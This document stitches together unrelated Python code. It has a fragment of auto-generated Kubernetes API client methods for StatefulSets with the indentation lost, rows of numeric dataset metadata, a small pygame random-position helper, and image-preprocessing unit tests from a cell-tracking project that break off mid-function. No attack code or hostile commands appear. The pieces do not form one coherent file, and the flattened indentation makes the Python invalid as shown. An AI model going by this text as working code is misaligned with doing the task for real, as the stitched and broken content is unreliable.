callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
collection_formats=collection_formats)
def replace_apps_v1alpha1_namespaced_stateful_set_status(self, name, namespace, body, **kwargs):
"""
replace status of the specified StatefulSet
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.replace_apps_v1alpha1_namespaced_stateful_set_status(name, namespace, body, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str name: name of the StatefulSet (required)
:param str namespace: object name and auth scope, such as for teams and projects (required)
:param V1alpha1StatefulSet body: (required)
:param str pretty: If 'true', then the output is pretty printed.
:return: V1alpha1StatefulSet
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.replace_apps_v1alpha1_namespaced_stateful_set_status_with_http_info(name, namespace, body, **kwargs)
else:
(data) = self.replace_apps_v1alpha1_namespaced_stateful_set_status_with_http_info(name, namespace, body, **kwargs)
return data
def replace_apps_v1alpha1_namespaced_stateful_set_status_with_http_info(self, name, namespace, body, **kwargs):
"""
replace status of the specified StatefulSet
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.replace_apps_v1alpha1_namespaced_stateful_set_status_with_http_info(name, namespace, body, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str name: name of the StatefulSet (required)
:param str namespace: object name and auth scope, such as for teams and projects (required)
:param V1alpha1StatefulSet body: (required)
:param str pretty: If 'true', then the output is pretty printed.
:return: V1alpha1StatefulSet
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['name', 'namespace', 'body', 'pretty']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method replace_apps_v1alpha1_namespaced_stateful_set_status" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'name' is set
if ('name' not in params) or (params['name'] is None):
raise ValueError("Missing the required parameter `name` when calling `replace_apps_v1alpha1_namespaced_stateful_set_status`")
# verify the required parameter 'namespace' is set
if ('namespace' not in params) or (params['namespace'] is None):
raise ValueError("Missing the required parameter `namespace` when calling `replace_apps_v1alpha1_namespaced_stateful_set_status`")
# verify the required parameter 'body' is set
if ('body' not in params) or (params['body'] is None):
raise ValueError("Missing the required parameter `body` when calling `replace_apps_v1alpha1_namespaced_stateful_set_status`")
collection_formats = {}
resource_path = '/apis/apps/v1alpha1/namespaces/{namespace}/statefulsets/{name}/status'.replace('{format}', 'json')
path_params = {}
if 'name' in params:
path_params['name'] = params['name']
if 'namespace' in params:
path_params['namespace'] = params['namespace']
query_params = {}
if 'pretty' in params:
query_params['pretty'] = params['pretty']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json', 'application/yaml', 'application/vnd.kubernetes.protobuf'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['*/*'])
# Authentication setting
auth_settings = ['BearerToken']
return self.api_client.call_api(resource_path, 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='V1alpha1StatefulSet',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
collection_formats=collection_formats)
def watch_apps_v1alpha1_namespaced_stateful_set(self, name, namespace, **kwargs):
"""
watch changes to an object of kind StatefulSet
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.watch_apps_v1alpha1_namespaced_stateful_set(name, namespace, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str name: name of the StatefulSet (required)
:param str namespace: object name and auth scope, such as for teams and projects (required)
:param str field_selector: A selector to restrict the list of returned objects by their fields. Defaults to everything.
:param str label_selector: A selector to restrict the list of returned objects by their labels. Defaults to everything.
:param str pretty: If 'true', then the output is pretty printed.
:param str resource_version: When specified with a watch call, shows changes that occur after that particular version of a resource. Defaults to changes from the beginning of history.
:param int timeout_seconds: Timeout for the list/watch call.
:param bool watch: Watch for changes to the described resources and return them as a stream of add, update, and remove notifications. Specify resourceVersion.
:return: VersionedEvent
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.watch_apps_v1alpha1_namespaced_stateful_set_with_http_info(name, namespace, **kwargs)
else:
(data) = self.watch_apps_v1alpha1_namespaced_stateful_set_with_http_info(name, namespace, **kwargs)
return data
def watch_apps_v1alpha1_namespaced_stateful_set_with_http_info(self, name, namespace, **kwargs):
"""
watch changes to an object of kind StatefulSet
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.watch_apps_v1alpha1_namespaced_stateful_set_with_http_info(name, namespace, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str name: name of the StatefulSet (required)
:param str namespace: object name and auth scope, such as for teams and projects (required)
:param str field_selector: A selector to restrict the list of returned objects by their fields. Defaults to everything.
:param str label_selector: A selector to restrict the list of returned objects by their labels. Defaults to everything.
:param str pretty: If 'true', then the output is pretty printed.
:param str resource_version: When specified with a watch call, shows changes that occur after that particular version of a resource. Defaults to changes from the beginning of history.
:param int timeout_seconds: Timeout for the list/watch call.
:param bool watch: Watch for changes to the described resources and return them as a stream of add, update, and remove notifications. Specify resourceVersion.
:return: VersionedEvent
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['name', 'namespace', 'field_selector', 'label_selector', 'pretty', 'resource_version', 'timeout_seconds', 'watch']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method watch_apps_v1alpha1_namespaced_stateful_set" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'name' is set
if ('name' not in params) or (params['name'] is None):
raise ValueError("Missing the required parameter `name` when calling `watch_apps_v1alpha1_namespaced_stateful_set`")
# verify the required parameter 'namespace' is set
if ('namespace' not in params) or (params['namespace'] is None):
raise ValueError("Missing the required parameter `namespace` when calling `watch_apps_v1alpha1_namespaced_stateful_set`")
collection_formats = {}
resource_path = '/apis/apps/v1alpha1/watch/namespaces/{namespace}/statefulsets/{name}'.replace('{format}', 'json')
path_params = {}
if 'name' in params:
path_params['name'] = params['name']
if 'namespace' in params:
path_params['namespace'] = params['namespace']
query_params = {}
if 'field_selector' in params:
query_params['fieldSelector'] = params['field_selector']
if 'label_selector' in params:
query_params['labelSelector'] = params['label_selector']
if 'pretty' in params:
query_params['pretty'] = params['pretty']
if 'resource_version' in params:
query_params['resourceVersion'] = params['resource_version']
if 'timeout_seconds' in params:
query_params['timeoutSeconds'] = params['timeout_seconds']
if 'watch' in params:
query_params['watch'] = params['watch']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json', 'application/yaml', 'application/vnd.kubernetes.protobuf', 'application/json;stream=watch', 'application/vnd.kubernetes.protobuf;stream=watch'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['*/*'])
# Authentication setting
auth_settings = ['BearerToken']
return self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='VersionedEvent',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
collection_formats=collection_formats)
def watch_apps_v1alpha1_namespaced_stateful_set_list(self, namespace, **kwargs):
"""
watch individual changes to a list of StatefulSet
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.watch_apps_v1alpha1_namespaced_stateful_set_list(namespace, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str namespace: object name and auth scope, such as for teams and projects (required)
:param str field_selector: A selector to restrict the list of returned objects by their fields. Defaults to everything.
:param str label_selector: A selector to restrict the list of returned objects by their labels. Defaults to everything.
:param str pretty: If 'true', then the output is pretty printed.
:param str resource_version: When specified with a watch call, shows changes that occur after that particular version of a resource. Defaults to changes from the beginning of history.
:param int timeout_seconds: Timeout for the list/watch call.
:param bool watch: Watch for changes to the described resources and return them as a stream of add, update, and remove notifications. Specify resourceVersion.
:return: VersionedEvent
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.watch_apps_v1alpha1_namespaced_stateful_set_list_with_http_info(namespace, **kwargs)
else:
(data) = self.watch_apps_v1alpha1_namespaced_stateful_set_list_with_http_info(namespace, **kwargs)
return data
def watch_apps_v1alpha1_namespaced_stateful_set_list_with_http_info(self, namespace, **kwargs):
"""
watch individual changes to a list of StatefulSet
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.watch_apps_v1alpha1_namespaced_stateful_set_list_with_http_info(namespace, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str namespace: object name and auth scope, such as for teams and projects (required)
:param str field_selector: A selector to restrict the list of returned objects by their fields. Defaults to everything.
:param str label_selector: A selector to restrict the list of returned objects by their labels. Defaults to everything.
:param str pretty: If 'true', then the output is pretty printed.
:param str resource_version: When specified with a watch call, shows changes that occur after that particular version of a resource. Defaults to changes from the beginning of history.
:param int timeout_seconds: Timeout for the list/watch call.
:param bool watch: Watch for changes to the described resources and return them as a stream of add, update, and remove notifications. Specify resourceVersion.
:return: VersionedEvent
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['namespace', 'field_selector', 'label_selector', 'pretty', 'resource_version', 'timeout_seconds', 'watch']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method watch_apps_v1alpha1_namespaced_stateful_set_list" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'namespace' is set
if ('namespace' not in params) or (params['namespace'] is None):
raise ValueError("Missing the required parameter `namespace` when calling `watch_apps_v1alpha1_namespaced_stateful_set_list`")
collection_formats = {}
resource_path = '/apis/apps/v1alpha1/watch/namespaces/{namespace}/statefulsets'.replace('{format}', 'json')
path_params = {}
if 'namespace' in params:
path_params['namespace'] = params['namespace']
query_params = {}
if 'field_selector' in params:
query_params['fieldSelector'] = params['field_selector']
if 'label_selector' in params:
query_params['labelSelector'] = params['label_selector']
if 'pretty' in params:
query_params['pretty'] = params['pretty']
if 'resource_version' in params:
query_params['resourceVersion'] = params['resource_version']
if 'timeout_seconds' in params:
query_params['timeoutSeconds'] = params['timeout_seconds']
if 'watch' in params:
query_params['watch'] = params['watch']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json', 'application/yaml', 'application/vnd.kubernetes.protobuf', 'application/json;stream=watch', 'application/vnd.kubernetes.protobuf;stream=watch'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['*/*'])
# Authentication setting
auth_settings = ['BearerToken']
return self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='VersionedEvent',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
collection_formats=collection_formats)
def watch_apps_v1alpha1_stateful_set_list_for_all_namespaces(self, **kwargs):
"""
watch individual changes to a list of StatefulSet
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.watch_apps_v1alpha1_stateful_set_list_for_all_namespaces(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str field_selector: A selector to restrict the list of returned objects by their fields. Defaults to everything.
:param str label_selector: A selector to restrict the list of returned objects by their labels. Defaults to everything.
:param str pretty: If 'true', then the output is pretty printed.
:param str resource_version: When specified with a watch call, shows changes that occur after that particular version of a resource. Defaults to changes from the beginning of history.
:param int timeout_seconds: Timeout for the list/watch call.
:param bool watch: Watch for changes to the described resources and return them as a stream of add, update, and remove notifications. Specify resourceVersion.
:return: VersionedEvent
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.watch_apps_v1alpha1_stateful_set_list_for_all_namespaces_with_http_info(**kwargs)
else:
(data) = self.watch_apps_v1alpha1_stateful_set_list_for_all_namespaces_with_http_info(**kwargs)
return data
def watch_apps_v1alpha1_stateful_set_list_for_all_namespaces_with_http_info(self, **kwargs):
"""
watch individual changes to a list of StatefulSet
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.watch_apps_v1alpha1_stateful_set_list_for_all_namespaces_with_http_info(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str field_selector: A selector to restrict the list of returned objects by their fields. Defaults to everything.
:param str label_selector: A selector to restrict the list of returned objects by their labels. Defaults to everything.
:param str pretty: If 'true', then the output is pretty printed.
:param str resource_version: When specified with a watch call, shows changes that occur after that particular version of a resource. Defaults to changes from the beginning of history.
:param int timeout_seconds: Timeout for the list/watch call.
:param bool watch: Watch for changes to the described resources and return them as a stream of add, update, and remove notifications. Specify resourceVersion.
:return: VersionedEvent
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['field_selector', 'label_selector', 'pretty', 'resource_version', 'timeout_seconds', 'watch']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method watch_apps_v1alpha1_stateful_set_list_for_all_namespaces" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
resource_path = '/apis/apps/v1alpha1/watch/statefulsets'.replace('{format}', 'json')
path_params = {}
query_params = {}
if 'field_selector' in params:
query_params['fieldSelector'] = params['field_selector']
if 'label_selector' in params:
query_params['labelSelector'] = params['label_selector']
if 'pretty' in params:
query_params['pretty'] = params['pretty']
if 'resource_version' in params:
query_params['resourceVersion'] = params['resource_version']
if 'timeout_seconds' in params:
query_params['timeoutSeconds'] = params['timeout_seconds']
if 'watch' in params:
query_params['watch'] = params['watch']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json', 'application/yaml', 'application/vnd.kubernetes.protobuf', 'application/json;stream=watch', 'application/vnd.kubernetes.protobuf;stream=watch'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['*/*'])
# Authentication setting
auth_settings = ['BearerToken']
return self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='VersionedEvent',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
collection_formats=collection_formats)
| 48.370734 | 198 | 0.613689 | 10,001 | 93,549 | 5.537146 | 0.027797 | 0.043339 | 0.041714 | 0.055258 | 0.981093 | 0.979739 | 0.978746 | 0.973924 | 0.971035 | 0.969879 | 0 | 0.005704 | 0.308501 | 93,549 | 1,933 | 199 | 48.395758 | 0.850346 | 0.371036 | 0 | 0.837514 | 1 | 0 | 0.225693 | 0.092404 | 0 | 0 | 0 | 0 | 0 | 1 | 0.033806 | false | 0 | 0.007634 | 0 | 0.091603 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
1030435d82e224634a75037eb8fe749cc8a3f02b | 135 | py | Python | utils.py | davidarias/py-shooting-game | 25a5e4a80678b0fd149baa9618da1a2aa3d55cc0 | [
"Beerware"
] | null | null | null | utils.py | davidarias/py-shooting-game | 25a5e4a80678b0fd149baa9618da1a2aa3d55cc0 | [
"Beerware"
] | null | null | null | utils.py | davidarias/py-shooting-game | 25a5e4a80678b0fd149baa9618da1a2aa3d55cc0 | [
"Beerware"
] | null | null | null | import pygame
import random
def random_position(start, stop):
return (random.randint(start, stop), random.randint(start, stop) )
| 19.285714 | 70 | 0.748148 | 18 | 135 | 5.555556 | 0.5 | 0.27 | 0.36 | 0.44 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.140741 | 135 | 6 | 71 | 22.5 | 0.862069 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.25 | false | 0 | 0.5 | 0.25 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 1 | 1 | 0 | 0 | 9 |
10645e09f7ed08fc24a4719d2ab24dbcb4d5b6f4 | 53,613 | py | Python | tests/model/test_preproc.py | JackToppen/deep-hipsc-tracking | 9d7e07814f26e3f76603bba1a945ae05e88733db | [
"BSD-3-Clause"
] | 2 | 2021-05-19T02:10:04.000Z | 2021-05-27T01:26:54.000Z | tests/model/test_preproc.py | JackToppen/deep-hipsc-tracking | 9d7e07814f26e3f76603bba1a945ae05e88733db | [
"BSD-3-Clause"
] | 1 | 2021-05-17T23:17:32.000Z | 2021-05-19T15:17:21.000Z | tests/model/test_preproc.py | JackToppen/deep-hipsc-tracking | 9d7e07814f26e3f76603bba1a945ae05e88733db | [
"BSD-3-Clause"
] | 1 | 2021-05-17T22:51:17.000Z | 2021-05-17T22:51:17.000Z | #!/usr/bin/env python3
# Imports
# Standard lib
import unittest
import pathlib
# 3rd party
import numpy as np
from PIL import Image
# Our own imports
from deep_hipsc_tracking.model import preproc
from deep_hipsc_tracking.model._preproc import composite_mask
from .. import helpers
# Helper Classes
class FakeDetector(object):
""" Mock a classic one output detector """
def __init__(self, predict=None):
if predict is None:
self.predict = self.predict_ones
else:
self.predict = predict
def predict_ones(self, batch_slab, batch_size):
return np.ones((batch_size, 1), dtype=np.float32)
class FakeConvDetector(object):
""" Mock a convolutional detector """
def __init__(self, in_shape, out_shape):
self.in_shape = in_shape
self.out_shape = out_shape
self.start_x = (in_shape[0] - out_shape[0])//2
self.start_y = (in_shape[1] - out_shape[1])//2
self.end_x = self.start_x + out_shape[0]
self.end_y = self.start_y + out_shape[1]
def predict(self, batch_slab):
assert batch_slab.ndim == 4
assert batch_slab.shape[1:3] == self.in_shape
return batch_slab[:, self.start_x:self.end_x, self.start_y:self.end_y, 0:1]
# Tests
class TestPredictWithSteps(unittest.TestCase):
def test_predicts_same_size_input_output(self):
img = np.random.ranf((256, 256))
detector = FakeConvDetector((256, 256), (256, 256))
res = preproc.predict_with_steps(img, detector, (256, 256), (256, 256))
self.assertEqual(res.shape, (256, 256))
np.testing.assert_almost_equal(res, img)
def test_predicts_one_off_input_output(self):
img = np.random.ranf((257, 257))
detector = FakeConvDetector((256, 256), (256, 256))
res = preproc.predict_with_steps(img, detector, (256, 256), (256, 256))
self.assertEqual(res.shape, (257, 257))
np.testing.assert_almost_equal(res, img)
def test_predicts_input_output_all_different(self):
img = np.random.ranf((257, 257))
detector = FakeConvDetector((256, 256), (225, 225))
res = preproc.predict_with_steps(img, detector, (256, 256), (225, 225))
self.assertEqual(res.shape, (257, 257))
np.testing.assert_almost_equal(res, img)
def test_predicts_input_output_countception_shape(self):
img = np.random.ranf((260, 347))
detector = FakeConvDetector((256, 256), (225, 225))
res = preproc.predict_with_steps(img, detector, (256, 256), (225, 225))
self.assertEqual(res.shape, (260, 347))
np.testing.assert_almost_equal(res, img)
def test_predicts_input_output_unet_shape(self):
img = np.random.ranf((260, 347))
detector = FakeConvDetector((256, 256), (68, 68))
res = preproc.predict_with_steps(img, detector, (256, 256), (68, 68))
self.assertEqual(res.shape, (260, 347))
np.testing.assert_almost_equal(res, img)
def test_predicts_input_output_with_small_overlap(self):
img = np.random.ranf((260, 347))
detector = FakeConvDetector((256, 256), (68, 68))
res = preproc.predict_with_steps(img, detector, (256, 256), (68, 68), overlap=1)
self.assertEqual(res.shape, (260, 347))
np.testing.assert_almost_equal(res, img)
def test_predicts_input_output_with_large_overlap(self):
img = np.random.ranf((260, 347))
detector = FakeConvDetector((256, 256), (68, 68))
res = preproc.predict_with_steps(img, detector, (256, 256), (68, 68), overlap=(10, 8))
self.assertEqual(res.shape, (260, 347))
np.testing.assert_almost_equal(res, img)
class TestCalculatePeakImage(unittest.TestCase):
def test_peaks_with_single_dot_equal_padding(self):
target_img = np.zeros((64, 64))
target_img[32, 32] = 1
x = np.arange(64) - 32
y = np.arange(64) - 32
xx, yy = np.meshgrid(x, y)
rr = np.sqrt(xx**2 + yy**2)
exp_img = (1 - rr/4)
exp_img[exp_img < 0] = 0
peak_img = preproc.calculate_peak_image(target_img,
img_rows=32, img_cols=32,
zero_padding=32,
peak_sharpness=8)
self.assertEqual(peak_img.shape, target_img.shape)
np.testing.assert_almost_equal(exp_img, peak_img)
class TestRandomSplit(unittest.TestCase):
def test_without_replacement(self):
ind = np.random.rand(16)
ind.sort()
samp, rem = preproc.random_split(ind, 8)
self.assertEqual(samp.shape, (8, ))
self.assertEqual(rem.shape, (8, ))
res = np.concatenate((samp, rem))
res.sort()
np.testing.assert_almost_equal(res, ind)
def test_without_replacement_too_many_samples(self):
ind = np.random.rand(16)
ind.sort()
samp, rem = preproc.random_split(ind, 20)
self.assertEqual(samp.shape, (16, ))
self.assertEqual(rem.shape, (0, ))
res = np.concatenate((samp, rem))
res.sort()
np.testing.assert_almost_equal(res, ind)
def test_with_replacement(self):
ind = np.random.rand(16)
ind.sort()
samp, rem = preproc.random_split(ind, 8, with_replacement=True)
self.assertEqual(samp.shape, (8, ))
self.assertEqual(rem.shape, (16, ))
np.testing.assert_almost_equal(ind, rem)
self.assertTrue(all([s in ind for s in samp]))
def test_with_replacement_too_many_samples(self):
ind = np.random.rand(16)
ind.sort()
samp, rem = preproc.random_split(ind, 20, with_replacement=True)
self.assertEqual(samp.shape, (20, ))
self.assertEqual(rem.shape, (16, ))
np.testing.assert_almost_equal(ind, rem)
self.assertTrue(all([s in ind for s in samp]))
class TestCompositeMask(unittest.TestCase):
def test_composite_one_sample_mean(self):
srows, scols = 16, 16
img = np.random.rand(16, 16, 3)
detector = FakeDetector()
res = composite_mask(img, detector,
srows=srows, scols=scols,
batch_stride=1,
mode='mean')
exp = np.ones((16, 16))
self.assertEqual(len(res), 1)
np.testing.assert_almost_equal(res[0], exp)
def test_composite_full_field_mean(self):
srows, scols = 16, 16
img = np.random.rand(32, 32, 3)
detector = FakeDetector()
res = composite_mask(img, detector,
srows=srows, scols=scols,
batch_stride=1,
mode='mean')
exp = np.ones((32, 32))
self.assertEqual(len(res), 1)
np.testing.assert_almost_equal(res[0], exp)
def test_composite_full_field_mean_small_batches(self):
srows, scols = 16, 16
img = np.random.rand(32, 32, 3)
detector = FakeDetector()
res = composite_mask(img, detector,
srows=srows, scols=scols,
batch_stride=1,
batch_size=2,
mode='mean')
exp = np.ones((32, 32))
self.assertEqual(len(res), 1)
np.testing.assert_almost_equal(res[0], exp)
res = composite_mask(img, detector,
srows=srows, scols=scols,
batch_stride=1,
batch_size=3,
mode='mean')
exp = np.ones((32, 32))
self.assertEqual(len(res), 1)
np.testing.assert_almost_equal(res[0], exp)
def test_composite_full_field_mean_strided(self):
srows, scols = 16, 16
img = np.random.rand(32, 32, 3)
detector = FakeDetector()
res = composite_mask(img, detector,
srows=srows, scols=scols,
batch_stride=5,
batch_size=2,
mode='mean')
exp = np.ones((32, 32))
exp[:, -1] = np.nan
exp[-1, :] = np.nan
self.assertEqual(len(res), 1)
np.testing.assert_almost_equal(res[0], exp)
def test_composite_full_field_mean_masked(self):
srows, scols = 16, 16
img = np.random.rand(32, 32, 3)
mask = np.zeros((32, 32), dtype=np.bool)
mask[:4, :4] = 1
mask[-4:, -4:] = 1
detector = FakeDetector()
res = composite_mask(img, detector,
mask=mask,
srows=srows, scols=scols,
batch_stride=5,
batch_size=2,
mode='mean')
exp = np.ones((32, 32))
exp[:, -1] = np.nan
exp[-1, :] = np.nan
exp[~mask] = np.nan
self.assertEqual(len(res), 1)
np.testing.assert_almost_equal(res[0], exp)
def test_composite_one_field_peaks(self):
srows, scols = 16, 16
img = np.random.rand(16, 16, 3)
detector = FakeDetector()
res = composite_mask(img, detector,
srows=srows, scols=scols,
batch_stride=1,
mode='peak')
exp = np.full((16, 16), np.nan)
exp[8, 8] = 1
self.assertEqual(len(res), 1)
np.testing.assert_almost_equal(res[0], exp)
def test_composite_full_field_peaks(self):
srows, scols = 16, 16
img = np.random.rand(32, 32, 3)
detector = FakeDetector()
res = composite_mask(img, detector,
srows=srows, scols=scols,
batch_stride=1,
mode='peaks')
exp = np.full((32, 32), np.nan)
exp[8:25, 8:25] = 1
self.assertEqual(len(res), 1)
np.testing.assert_almost_equal(res[0], exp)
def test_composite_full_field_peaks_rotations(self):
srows, scols = 16, 16
img = np.random.rand(32, 32, 3)
detector = FakeDetector()
res = composite_mask(img, detector,
srows=srows, scols=scols,
batch_stride=1,
mode='peaks',
transforms='rotations')
exp0 = np.full((32, 32), np.nan)
exp0[8:25, 8:25] = 1
exp1 = np.full((32, 32), np.nan)
exp1[8:25, 7:24] = 1
exp2 = np.full((32, 32), np.nan)
exp2[7:24, 7:24] = 1
exp3 = np.full((32, 32), np.nan)
exp3[7:24, 8:25] = 1
exp = [exp0, exp1, exp2, exp3]
self.assertEqual(len(res), len(exp))
for r, e in zip(res, exp):
np.testing.assert_almost_equal(r, e)
def test_composite_full_field_peaks_small_batches(self):
srows, scols = 16, 16
img = np.random.rand(32, 32, 3)
detector = FakeDetector()
res = composite_mask(img, detector,
srows=srows, scols=scols,
batch_stride=1,
batch_size=2,
mode='peaks')
exp = np.full((32, 32), np.nan)
exp[8:25, 8:25] = 1
self.assertEqual(len(res), 1)
np.testing.assert_almost_equal(res[0], exp)
res = composite_mask(img, detector,
srows=srows, scols=scols,
batch_stride=1,
batch_size=3,
mode='peaks')
exp = np.full((32, 32), np.nan)
exp[8:25, 8:25] = 1
self.assertEqual(len(res), 1)
np.testing.assert_almost_equal(res[0], exp)
def test_composite_full_field_peaks_strided(self):
srows, scols = 16, 16
img = np.random.rand(32, 32, 3)
detector = FakeDetector()
res = composite_mask(img, detector,
srows=srows, scols=scols,
batch_stride=5,
batch_size=2,
mode='peaks')
exp = np.full((32, 32), np.nan)
exp[6:26, 6:26] = 1
self.assertEqual(len(res), 1)
np.testing.assert_almost_equal(res[0], exp)
res = composite_mask(img, detector,
srows=srows, scols=scols,
batch_stride=5,
batch_size=3,
mode='peaks')
exp = np.full((32, 32), np.nan)
exp[6:26, 6:26] = 1
self.assertEqual(len(res), 1)
np.testing.assert_almost_equal(res[0], exp)
class TestCompleteSampler(unittest.TestCase):
def test_samples_upper_corner(self):
img = np.random.rand(300, 300, 3)
sampler = preproc.CompleteSampler(files=[],
image_layout='tensorflow',
batch_size=1,
input_shape=(64, 96, 3),
size_range=(128, 256),
rotation_range=(-10, 10),
flip_horizontal=True,
noise_type='none',
noise_fraction=0.1,
cache_size=None)
sampler.current_index = 0
sampler.current_slice = 0
out_img = sampler.slice_next(1, img)
self.assertEqual(sampler.current_index, 0)
self.assertEqual(sampler.current_slice, 1)
self.assertEqual(out_img.shape, (1, 64, 96, 3))
np.testing.assert_almost_equal(out_img[0, ...], img[:64, :96, :])
out_img = sampler.slice_next(1, img)
self.assertEqual(sampler.current_index, 0)
self.assertEqual(sampler.current_slice, 2)
self.assertEqual(out_img.shape, (1, 64, 96, 3))
np.testing.assert_almost_equal(out_img[0, ...], img[:64, 1:97, :])
def test_samples_over_whole_image(self):
img = np.random.rand(100, 100, 3)
sampler = preproc.CompleteSampler(files=[],
image_layout='tensorflow',
batch_size=1,
input_shape=(64, 96, 3),
size_range=(128, 256),
rotation_range=(-10, 10),
flip_horizontal=True,
noise_type='none',
noise_fraction=0.1,
cache_size=None)
sampler.current_index = 0
sampler.current_slice = 0
out_img = sampler.slice_next(185, img)
self.assertEqual(sampler.current_index, 1)
self.assertEqual(sampler.current_slice, 0)
self.assertEqual(out_img.shape, (185, 64, 96, 3))
for i in range(37):
for j in range(5):
idx = i * 5 + j
np.testing.assert_almost_equal(out_img[idx, ...],
img[i:i+64, j:j+96, :])
def test_samples_over_whole_image_color_to_gray(self):
img = np.random.rand(100, 100, 3)
img_gray = np.mean(img, axis=2)[..., np.newaxis]
sampler = preproc.CompleteSampler(files=[],
image_layout='tensorflow',
batch_size=1,
